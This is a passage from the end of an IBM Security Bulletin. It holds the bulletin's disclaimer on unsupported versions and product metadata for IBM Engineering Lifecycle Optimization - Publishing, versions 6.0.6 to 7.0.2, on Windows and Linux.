determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSUBFB","label":"IBM Engineering Lifecycle Optimization - Publishing"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

Tag

#ibm